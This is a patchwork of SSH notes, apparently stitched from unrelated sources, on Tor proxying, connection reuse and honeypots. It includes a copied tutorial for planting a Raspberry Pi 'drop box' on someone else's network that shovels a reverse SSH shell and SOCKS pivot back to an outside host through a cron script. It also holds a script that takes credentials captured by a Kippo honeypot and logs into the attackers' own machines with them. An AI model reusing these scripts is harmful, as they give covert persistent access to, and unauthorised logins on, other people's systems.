connect.c

A user may wish to use SSH with Tor for any number of reasons. To do this, download and install connect.c (above) and then add these lines to your SSH configuration:

Terminal
localhost:~ $ nano ~/.ssh/config

# this compresses the SSH traffic to make it less slow over Tor
Compression yes

ProxyCommand connect -5 -R remote -S localhost:9050 %h %p

After this has been added to the SSH configuration, a user can simply run ssh myserver to be routed through Tor to the hidden service (or clearnet server). This can also be done with proxychains, but the ProxyCommand directive is a permanent solution.

 


The good news is that you can configure SSH to reuse an existing connection. This means that, for example, if you have an SSH shell session running, a new connection for SCP can skip the connection setup phase. Two steps are required:

First, you must create a directory (or ‘folder’) which SSH will use to keep track of established connections:

mkdir ~/.ssh/tmp

Next, add these two lines at the start of your ~/.ssh/config (make sure to use your username in place of ‘YOUR-NAME’):

ControlMaster auto
ControlPath   /home/YOUR-NAME/.ssh/tmp/%h_%p_%r

As you can see, a small investment in time setting up your SSH configuration can pay back dividends in convenience.
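
An added check, not part of the original post: ssh_config(5) recommends that the ControlPath directory not be writable by other users, so this example audits a control-socket directory such as ~/.ssh/tmp and creates it privately. The function names and the scratch directory in the demo are assumptions for illustration.

```shell
#!/bin/sh
# check_control_dir DIR returns 0 only when DIR is a real directory (not a
# symlink), owned by the calling user, with no group/other permission bits.
check_control_dir() {
    dir=$1
    if [ -L "$dir" ] || [ ! -d "$dir" ]; then
        echo "FAIL: $dir is missing, a symlink, or not a directory" >&2
        return 1
    fi
    # ls -ldn prints the mode string first and the numeric owner third.
    read -r mode links owner rest <<EOF
$(ls -ldn "$dir")
EOF
    if [ "$owner" != "$(id -u)" ]; then
        echo "FAIL: $dir is owned by uid $owner" >&2
        return 1
    fi
    case $mode in
        d???------*) ;;   # trailing * allows an ACL or SELinux marker
        *)  echo "FAIL: $dir has mode $mode; run: chmod 700 $dir" >&2
            return 1 ;;
    esac
    echo "OK: $dir ($mode)"
}

# make_control_dir DIR creates DIR privately, or tightens an existing one.
make_control_dir() {
    ( umask 077 && mkdir -p "$1" ) && chmod 700 "$1" && check_control_dir "$1"
}

# Demo on a scratch directory (constructed path, not the real ~/.ssh/tmp).
demo=$(mktemp -d) && chmod 755 "$demo"
check_control_dir "$demo" || make_control_dir "$demo"
rm -rf "$demo"
```

Run check_control_dir against the directory named in your ControlPath before enabling ControlMaster auto.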


From: http://www.irongeek.com/i.php?page=security%2Fraspberry-pi-recipes&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+IrongeeksSecuritySite+%28Irongeek%27s+Security+Site%29#SSH_Phone_Home:_Using_the_Raspberry_Pi_as_a_proxy/pivot_(Shovel_a_Shell)


SSH Phone Home: Using the Raspberry Pi as a proxy/pivot (Shovel a Shell)

In this section I’ll cover setting up a Raspberry Pi to send you a Reverse Shell using SSH (AKA: Shovel a shell). This is pretty good for blowing past NAT and some firewalls with weak egress filtering. The idea is that you can use these as drop boxes to leave behind on someone else’s network, then have them remote back out to you. These instructions should work pretty much the same on any *nix device or distro that uses OpenSSH. Make sure you have OpenSSH installed, but most distros I’ve seen do.

  • These are the non-automated commands to do a reverse SSH connection and set up a Proxy/Pivot using OpenSSH.
    On the Raspberry Pi use the following command:

        ssh -R 1974:localhost:22 [email protected]

  • On PC (must have SSH server on box):

        ssh -D 1080 -p 1974 [email protected]

The above command also opens up a SOCKS port on your local PC that you can use to tunnel traffic into the Raspberry Pi’s network.

Automating it

Ok, the commands above were just to do it manually, how about automating the shell shoveling? I based my work on Brandon Hutchinson’s script for automating the SSH reverse connection every 5 min, so check out his site:
http://www.brandonhutchinson.com/Passwordless_ssh_logins.html
http://www.brandonhutchinson.com/ssh_tunnelling.html

Here are the steps:
1. SSH Keys Setup
Do the following on the Raspberry Pi, but replace “root” with the username on your home PC (I use home.irongeek.com in these examples)

        ssh-keygen -t rsa

Use a blank passphrase. The next line copies the key to the PC:

        cat ~/.ssh/id_rsa.pub | ssh [email protected] "cat - >> ~/.ssh/authorized_keys"

2. Reverse SSH Automatic Script
Make a script called “autossh” on the Raspberry Pi with the contents of this script, replacing the parameters in green as needed:

#!/bin/sh
# Based on http://www.brandonhutchinson.com/ssh_tunnelling.html

# $REMOTE_HOST is the name of the remote system
REMOTE_HOST=home.irongeek.com

# Setting my username for home box, you will most likely want to change this
USER_NAME=root

# $REMOTE_PORT is the remote port number that will be used to tunnel
# back to this system
REMOTE_PORT=1974

# $COMMAND is the command used to create the reverse ssh tunnel
COMMAND="ssh -q -N -R $REMOTE_PORT:localhost:22 $USER_NAME@$REMOTE_HOST"

# Is the tunnel up? Perform two tests:

# 1. Check for relevant process ($COMMAND)
pgrep -f -x "$COMMAND" > /dev/null 2>&1 || $COMMAND

# 2. Test tunnel by looking at "netstat" output on $REMOTE_HOST
ssh $REMOTE_HOST netstat -an | egrep "tcp.*:$REMOTE_PORT.*LISTEN" \
    > /dev/null 2>&1
if [ $? -ne 0 ] ; then
    pkill -f -x "$COMMAND"
    $COMMAND
fi

and set it as executable with:

        chmod 755 autossh

3. Use the “crontab -e” command on your Raspberry Pi to schedule the script to run every 5 min. The entry will be something like:

        */5 * * * * /home/pi/autossh

4. Now go to your home PC and you should be able to use this command to connect to the waiting shell:

        ssh -D 1080 -p 1974 [email protected]

Use port 1080 on the localhost for tools that will work with a SOCKS proxy and tunnel traffic into the remote network.

 


First we log all the connection attempts to my server (live or new virtual machine) using the package called Kippo – http://code.google.com/p/kippo/.

Then we create this file, which I called grab_ssh_info.sh.

#!/bin/bash

 # Run this every day at least in order to get all the entries.
 # Run this before the logrotate does its work on the kippo log(You are rotating it right?) for the day/week/month$
 # Cron could be 44 min mark every hour so when it rotates at midnight you will not lose much data.

# Start a new log.
if [ -e /root/scripts/kippo_ssh_auths.log ]; then
 rm /root/scripts/kippo_ssh_auths.log
fi

# Since I am only looking at the recent listings, only look at todays based on the date timestamp
todays_date=$(date +%F)
# Only read todays and loop each line in the string
grep -i "$todays_date" /home/ris/kippo-0.5/log/kippo.log | while read -r line; do

 # Only read the lines that contain login auths and IPs. All in one line in this case.
 if echo "$line" | grep -qi "login attempt"; then
  # Cut out the different parts.
  inIP=$(echo "$line" | grep -i "login attempt" | cut -d '[' -f 2 | cut -d ',' -f 3 | cut -d ']' -f 1)
  inUSER=$(echo "$line" | grep -i "login attempt" | cut -d '[' -f 3 | cut -d '/' -f 1)
  inPASS=$(echo "$line" | grep -i "login attempt" | cut -d '[' -f 3 | cut -d '/' -f 2 | cut -d ']' -f 1)

  # Throw it all in together for outputting to a log of my own.
  output="$inIP|$inUSER|$inPASS"
  #echo $output

  # IF we do not already have it in the log, append the info to it.
  if [ ! -e /root/scripts/kippo_ssh_auths.log ]; then
   touch /root/scripts/kippo_ssh_auths.log
  fi

  # -x -F: compare whole lines as fixed strings, so regex characters in a password are not interpreted.
  grep -qxF -- "$output" /root/scripts/kippo_ssh_auths.log
  if [ $? == 1 ]; then
   echo "$inIP|$inUSER|$inPASS" >> /root/scripts/kippo_ssh_auths.log
  fi
 fi
done
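
An added example, not part of the original post: it goes one step beyond the extraction above and summarises attempts per source IP, keeping passwords that contain "/" or "]" intact, which the cut fields would truncate. The function names are assumptions, and the sample lines are constructed to match the layout implied by the cut commands.

```shell
#!/bin/sh
# kippo_summary MIN reads kippo.log lines on stdin and prints
# "IP|attempts|distinct_credentials" for IPs with at least MIN attempts,
# busiest first.
kippo_summary() {
    awk -v min="${1:-1}" '
    {
        mark = "] login attempt ["
        i = index($0, "[")
        j = index($0, mark)
        if (i == 0 || j == 0 || i > j) next   # not a login-attempt line
        # Header looks like: SSHService ssh-userauth on HoneyPotTransport,N,IP
        n = split(substr($0, i + 1, j - i - 1), part, ",")
        ip = part[n]
        # Credentials run to the final "] failed" or "] succeeded", so a
        # password containing "/" or "]" is kept whole.
        cred = substr($0, j + length(mark))
        sub(/\] (failed|succeeded)[ \t\r]*$/, "", cred)
        attempts[ip]++
        if (!((ip, cred) in seen)) { seen[ip, cred] = 1; distinct[ip]++ }
    }
    END {
        for (ip in attempts)
            if (attempts[ip] >= min + 0)
                printf "%s|%d|%d\n", ip, attempts[ip], distinct[ip]
    }' | sort -t "|" -k2,2nr -k1,1
}

# Constructed sample lines (documentation IP ranges, made-up credentials).
sample_log() {
    cat <<'EOF'
2013-02-10 14:36:01+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.7] login attempt [root/123456] failed
2013-02-10 14:36:03+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.7] login attempt [root/pa/ss]w0rd] failed
2013-02-10 14:36:05+0000 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.7] login attempt [root/123456] failed
2013-02-10 14:40:11+0000 [SSHService ssh-userauth on HoneyPotTransport,3,203.0.113.9] login attempt [admin/admin] succeeded
2013-02-10 14:40:12+0000 [HoneyPotTransport,3,203.0.113.9] connection lost
EOF
}

sample_log | kippo_summary 1
```
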

Then we can use the copy of the /root/kippo_ssh_auths.log log to try to connect BACK to the door knocker's machine and see if the login works.
If it does, add it to a success log(if new) and go on to the next one.
If it fails, ignore it. It will be deleted when we delete the copy of the log file at the end of the script.
I call this file test_ssh_info.sh

#!/bin/bash

# This script will mv the /root/scripts/kippo_ssh_auths.log log to /root/scripts/test_ssh_auths.log
# so we can safely work on it.

# After moving, it will go line by line and take the arguments and test them by ssh.
# If it works, the info will be written to another log, /root/scripts/valid_ssh_auths.log for any other usage.

# Suggest running at 45 min mark every hour. Right after the grab info script.

mv /root/scripts/kippo_ssh_auths.log /root/scripts/test_ssh_auths.log

# Old string separator
oifs=$IFS
# The one we want
IFS="|"

while read line; do

 echo "Testing: $line"
 # Split the line into a array
 # Format IP|USERNAME|PASSWORD
 tmp_arr=($line)
 testip=${tmp_arr[0]}
 testuser=${tmp_arr[1]}
 testpass=${tmp_arr[2]}
# echo "$testip $testuser $testpass"

 # Use the tool sshpass to passthrough a password to ssh
 # How can I do this in parallel ?
sshpass -p "$testpass" ssh -q -o "StrictHostKeyChecking no" -l "$testuser" $testip "exit"
# sshpass -p "$testpass" ssh -o "StrictHostKeyChecking no" -l "$testuser" $testip "exit"

 testssh=$?
# echo "Return Code: $testssh"

 # sshpass will exit with code 0 if it logged in ok.
 # ?? I was testing it and had some errors using the script. It would exit with 5. If I did it manually, it worked $
 if [ $testssh == 0 ]; then
  output="$testip|$testuser|$testpass"

  if [ ! -e /root/scripts/valid_ssh_auths.log ]; then
   touch /root/scripts/valid_ssh_auths.log
  fi

  grep -q "$output" /root/scripts/valid_ssh_auths.log
  if [ $? == 1 ]; then
   echo "$line" >> /root/scripts/valid_ssh_auths.log
   echo "Valid: $line"
  else
   echo "NOT Valid: $line"
  fi
 fi

done < /root/scripts/test_ssh_auths.log;

# Change back the string separator
IFS=$oifs

# Remove the log that we tested
rm /root/scripts/test_ssh_auths.log

Small script (start_kippo.sh) for cron to make sure your Kippo is still running.
I noticed that the small VPS I was running would kill Kippo once in a while because I ran out of memory (32MB) and swap (32MB). So I tested every minute to see if it needed starting again.

#!/bin/bash

ps aux | grep -i twistd | grep -q -i kippo
code=$?

if [ $code == 1 ]; then
 cd  /home/ris/kippo-0.5/
 sudo -u ris  /home/ris/kippo-0.5/start.sh
 echo "Started Kippo again."
fi

Set your log rotation to cycle the Kippo log every 24 hours or my scripts will be retesting a lot of SSH connections.
Set your cron to run them whenever. I recommend just before the logrotate cycle. Just make sure it is sequenced right: do the grab script first.
